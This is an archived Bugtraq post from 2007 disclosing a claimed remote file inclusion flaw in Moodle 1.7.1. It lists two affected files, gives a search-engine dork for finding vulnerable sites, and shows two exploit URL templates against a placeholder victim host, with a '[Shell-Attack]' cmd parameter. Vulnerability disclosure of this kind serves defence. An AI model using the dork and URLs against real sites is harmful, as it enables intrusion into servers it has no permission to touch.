Bugtraq mailing list archives

Remote File Include In Script moodle-1.7.1


From: "RaeD Hasadya" <raed () bsdmail com>
Date: Mon, 12 Mar 2007 01:41:04 +0800

By Hasadya Raed
Contact : RaeD [At] BsdMail [Dot] Com
--------------------------------------------------------------------------
Script : moodle-1.7.1
Dork : "Copyright (c) moodle"
--------------------------------------------------------------------------
B.Files : 
utfdbmigrate.php
filter.php
--------------------------------------------------------------------------
Exploits :
http://www.Victim.com/moodle/admin/utfdbmigrate.php?cmd=[Shell-Attack]
http://www.Victim.com/moodle/filter.php?cmd=[Shell-Attack]

 

-- 
_______________________________________________
Get your free email from http://bsdmail.com


Current thread: